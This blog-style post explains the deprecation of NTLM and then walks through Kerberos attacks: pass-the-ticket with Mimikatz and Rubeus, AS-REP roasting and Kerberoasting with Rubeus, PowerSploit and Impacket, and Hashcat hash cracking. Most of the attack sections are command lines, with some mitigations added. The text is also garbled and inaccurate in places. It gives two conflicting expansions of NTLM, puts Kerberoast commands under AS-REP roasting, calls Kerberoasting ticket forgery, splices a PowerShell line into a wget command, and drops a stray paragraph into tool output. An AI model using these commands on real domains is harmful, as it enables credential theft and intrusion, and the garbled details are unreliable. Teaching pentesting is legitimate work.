In the ever-changing landscape of network security, it’s really important to stay updated with the latest protocols and technologies is really important. One significant shift in this domain is the depreciation of protocol called NTLM (NT LAN Manager). In 2024 it’s really important to understand this change, and more importantly understand what is NTLM and why NTLM is no longer favoured, and lastly what you should focus on next is really important for any cybersecurity professional for staying ahead of the crowd. In this blog, we’ll walk through the history of NTLM, its inner working and inherent flaws, and the shift towards more secure alternatives like Kerberos. Lastly we’ll also cover top three attacks on Kerberos and how to perform these tests to audit and secure an Active Directory (AD) network.
What’s NTLM
NTLM (Network Level Trust Manager) is a suite of Microsoft security protocols designed to provide authentication, integrity, and confidentiality to users in a network.
How does NTLM work?
In a single sentence if I had to sum up how NTLM operates, then it would be something like NTML operates by challenging and responding during the authentication process to verify a user’s or computer’s identity in the network.
Well if all these terminologies just go above your head have a look at this short diagram and it will make much sense to you. Credits
How NTLM
Worked
As we have discussed earlier in the blog, NTLM authentication involves a challenge-response mechanism to verify a user’s identity often without sending a password over the network. Here’s a simplified breakdown:
- User Logon: The user enters their credentials (username and password) on their device, which initiates the authentication process.
- Challenge: The server sends a challenge (a random number) to the user’s device.
- Response: The user’s device encrypts this challenge using the user’s password hash and sends it back to the server.
- Verification: The server, (which has a copy of the user’s password hash), performs the same encryption on the challenge and compares it to the response received. If they match, authentication is successful. Else it ends up with an unsuccessful authentication.
Now, this might not cover the entire technicality on how NTLM works but it should be suffice for anyone to know how NTLM worked. Also earlier we had mentioned that NTLM is an flawed protocol right, let’s deep dive on why it’s no longer recommended to use NTLM.
Where NTLM
is Flawed
Despite its long-standing use, NTLM has several critical vulnerabilities, such as:
Weak Encryption: NTLM relies on outdated cryptographic algorithms that are susceptible to brute-force attacks.
- NTLMv1 uses MD4 for hasing passwords, this protocol is susceptible to collision attacks, where different input can result in same hash value.
- NTLMv1 uses DES [Data Encryption Standard] for encrypting the challenge and response process. This algorithm relies on 56-bit length key which is very short for a key and is vulnerable to attacks like brute force.
Replay Attacks: NTLM does not use any form of session binding, making it vulnerable to replay attacks. As the name suggests, this attack involves in capturing a valid authentication token and then reusing or replaying it to gain unauthorised access.Note that this attack method does not alter or make any changes to the captured text or information but we simply resend it to impersonate a legit user.
Then we have NTLM relay attack: This attack involves an attacker intercepting the authentication request just like previous one, but in this the attack forwards this request or relays the authentication request to another server. In nutshell the attacker acts like man-in-the-middle, where the attacker can abuse the intercepted credentials to authenticate into a different server, which results in gaining unauthorised access to the server.
The key difference to note is that replay attack captures the authentication without modification, but in relay attack we capture the authentication and use it elsewhere [different server].
Now practically speaking it makes no sense to attack or kill a dead snake, in our case the dead snake is NTLM. But just in case you ever come across NTLM supported network and wish to audit or perform a pentest feel free to check 2 hour NTLM relaying workshop by sans. They include cool 41 gb LAB, and cover plethora of attacks related to NTLM relaying. Note that these attacks are not stealth, but yeah they get our job done. Check out the following links for attending the workshop.
The workshop
Workshop Notes and references
Lab Download
Pass-the-Hash Attacks: Attackers can capture hashed passwords and use them to authenticate as the user, bypassing the need for the plaintext password.
Lack of Mutual Authentication: NTLM does not provide server authentication to the client, leaving users vulnerable to man-in-the-middle attacks.
Given these vulnerabilities, NTLM is clearly out in favor of more secure alternatives like Kerberos and the Negotiate protocol.(Negotiate protocol simply switches between NTLM and Kerberos depending on circumstances). So later on in this blog we will focus on kerberos protocol
.
Moving Forward: Focus on Kerberos
With NTLM is depreciated now, let’s shift our focus from the dead snake to the soaring eagle, Kerberos which is supposed to be a more secure authentication protocol (only if we implement it properly).
Working of Kerberos
Authentication Protocol
Now there are a slight variations of authentication workings that are found on internet, some claim it’s 6 step process, and in that 6 step there are sligh inconsistencies. But for our understanding let’s summarize the inner working of kerberos
broadly into three types.
Initial Authentication: The Authentication Server (AS) in the Kerberos system receives the user’s credentials when they first log in. When the credentials are confirmed to be genuine by a database, the AS provides a Ticket-Granting Ticket (TGT).
Ticket Granting: After the user provides the TGT to the Ticket Granting Server (TGS), the user can obtain a Service Ticket (ST) for any desired service.
Accessing Services: With the service ticket, users can access the desired service on the network.
Suggested reading: Kerberos for the busy Admin
Top 3 Attacks on Kerberos and How to Perform These Tests
While Kerberos is more secure than NTLM, without its comes up with it’s own set of vulnerabilities. Here are the top three attacks on Kerberos you should be aware of, when it comes to the topic of kerberos authentication.
Now you shenanigans must be thinking of attacks like bruteforcing kerberos, and other attacks, but note that when good Active Directory Group Policies are enforced, then these attacks might be really in-effective. But if you still want to learn how to do brute force on kerberos environment then check out this blog.
First let’s start with enumeration on the AD network and then slowly move towards the three exploitation techniques.
0. Enumeration
In a Windows environment, the setspn
command is a powerful tool for enumerating SPNs (service principal name).
setspn -T [Domain] -Q */*
Also powershell based tools like powerview
offer other convenient ways to enumerate SPNs
Get-DomainUser -SPN | Select SamAccountName,DisplayName,ServicePrincipalName
1. Pass-the-Ticket Attack
Overview: In this attack, hackers capture and reuse Kerberos tickets
to authenticate as the user (impersonate user) without needing their credentials. As simple as the definition, if we have valid kerberos tickets we can try to authenticate to the server.
Performing Pass-the-Ticket Attack using mimikatz
- Capture Tickets: Use a tool like
Mimikatz
to extract Kerberos tickets (TGT and TGS) from a compromised machine to which you have access.
Before using mimikatz
first we need to elevate privileges
mimikatz.exe
privilege::debug
token::elevate
Now using mimikatz we can perform pass the ticket attack
mimikatz.exe "sekurlsa::tickets /export"
mimikatz.exe "kerberos::ptt <ticket>"
Reuse Tickets: Load the captured tickets into your session to gain access to network resources.
kerberos::ptt [ticket.kirbi]
Performing Pass-the-Ticket Attack using Rubeus
.\Rubeus.exe asktgt /user:<username> /rc4:<hash> /domain:<domain> /dc:<domain_controller>
.\Rubeus.exe ptt /ticket:<ticket>
Mitigation:
1. Setting Ticket Lifetime Policy
One can use the following powershell command to limit the maximum lifetime for kerberos tickets.
Set-ADObject -Identity "CN=<PolicyName>,CN=Policies,CN=System,DC=<domain>" -Replace @{"maxTicketAge"="<time>"}
2.Enable AES encryption for kerberos for preventing
Set-ADObject -Identity "CN=Kerberos,CN=Security,CN=Configuration,DC=<domain>" -Replace @{"msDS-SupportedEncryptionTypes"="28"}
3.You can look and monitor for suspecious windows event, using Advance Threat Analytics.
You can read the full detailed gude here
2. AS-REP Roasting
Overview: AS-REP Roasting takes advantage of Active Directory user accounts that have the option Do not require Kerberos preauthentication
enabled. This attack must sound familiar as this attacks the AS REP
process in kerberos authentication.
Performing AS-REP Roasting
with Rubeus:
Rubeus.exe kerberoast /simple /outfile:C:\Temp\Kerbhashes.txt
This command instructs Rubeus to Kerberoast all users in the domain and output the hashed credentials to a file.
Additionally you can also leverage the PowerShell cmdlet Invoke-Rubeus for similar purposes:
Invoke-Rubeus -Command "kerberoast /simple /outfile:C:\Temp\Kerbhashes.txt"
Cracking the Hashes:
Once you have gathered the hashed credentials, you can crack them using tools like Hashcat.
hashcat -m 13100 -a 0 -O hashes.txt rockyou.txt -r rules.rule
Mitigation:
Enforce Preauthentication: This practice alone reduces the chances of AS-REP roasting Reference
Setting up a strong password policies: Again this should be no brainer and check out the references .
Monitoring and Alerting: Use security solutions to monitor for suspicious activities related to AS-REP Roasting and set up alerts helps to proactively monitor, detect and respond to these attacks better.
Identifying Vulnerable Accounts: Using the following powershell command you can list all user accounts that have pre-auth
disabled, which means they are vulnerable to as-rep
roasting.
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
3. Kerbroasting
Overview: Attackers forge Kerberos Service Tickets (TGS) to gain unauthorised access to specific services.
Now let’s look some of the top 5 widely used tools for performing kerbroasting and how to perform kerbroasting.
1. Rubeus: The Swiss Army Knife for Kerberos
Rubeus is a versatile tool (written in c#) that provides a plethora of functionalities for interacting with Kerberos which performs actions from harvesting tickets to performing Kerberoasting attacks.
Harvesting TGT every x seconds:
rubeus.exe harvest /interval:30
Basic Kerberoasting:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local
TGT Delegation Trick:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /tgtdeleg
Roasting AES-Enabled Accounts:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /aes
Roasting with Alternate Credentials:
rubeus.exe kerberoast /spn:ldap/dc1.ignite.local/ignite.local /creduser:ignite.local\Administrator /credpassword:Ignite@987
2. Powersploit: Invoke-Kerberoast
This tool (which is part of powersploit framework) is handy for enumerating all user accounts with non-null service principal names (SPNs) and extracts ticket information for further analysis or cracking.
Enumerate Kerberoastable Accounts:
Invoke-Kerberoast | fl
Specify Domain for Enumeration:
Invoke-Kerberoast -Domain dev.testlab.local | fl
Securely Convert String to Password Object:
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
3. Bloodhound
or Sharphound
: Mapping Kerberos Trust Relationships
Bloodhound
or Sharphound
is invaluable tool for visualizing and understanding Kerberos trust relationships within Active Directory environments.
4. Impacket: Kerberoasting Made Easy
Impacket simplifies Kerberoasting with its GetUserSPNs.py
script, allowing attackers to dump Kerberos hashes
for finding the kerberoastable accounts
remotely.
Impacket Installation:
cd /opt
wget Get-DomainUser -SPN | Select SamAccountName,DisplayName,ServicePrincipalName
https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/Impacket-0.9.19.tar.gz
tar -xvf Impacket-0.9.19.tar.gz
cd Impacket-0.9.19
sudo pip install .
Kerberoasting with Impacket:
cd /usr/share/doc/python3-impacket/examples/
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip MACHINE_IP -request
**Cracking the extracted hashes: **
hashcat -m 13100 -a 0 hash.txt Pass.txt
5. Sharp Roast: Legacy Kerberoasting Tool
Although deprecated in favor of Rubeus, Sharp Roast remains a notable Kerberoasting tool. By enumerating service principal names (SPNs) and extracting Kerberos hashes, Sharp Roast facilitates the identification of vulnerable accounts for further exploitation.
- Enumerate and Extract Hashes for All Kerberoastable Accounts:
C:\Temp>SharpRoast.exe all
SamAccountName : winad10Given these vulnerabilities, NTLM is being phased out in favor of more secure alternatives like Kerberos and the Negotiate protocol.(Negotiate protocol simply switches between NTLM and Kerberos depending on circumstances).
DistinguishedName : CN=winad10,CN=Users,DC=lab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$lab.local$asdf/asdfasdf*$14AA4F...
SamAccountName : sqlservice
DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/lab.local
Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/lab.local*$99D1...
Mitigation :
Restrict Access to KRBTGT Account: Protect the KRBTGT account
with a secure password,as this account is essential for the creation of Kerberos ticket-granting tickets.
Proper Governance for Service Accounts: Regularly review and update service account privileges
Note:
Now if you wish to dive into technicalities of various windows events and IOC hunting for both kerbroasting
and as-rep
roasting from the defender’s point of view then it’s highly suggested to read this blog
Conclusion
As we transition to more secure authentication methods such as Kerberos, it is critical to understand it’s potential weaknesses and various pentest techniques related to Kerberos. You may strengthen your network security and defend your network better by being aware of typical attacks on Kerberos, such as Pass-the-Ticket
, AS-REP roasting
, and Kerbroasting
attacks.
Accept the shift, learn more about Kerberos, and maintain your advantage in the rapidly changing cybersecurity industry. NTLM is dead; long live Kerberos!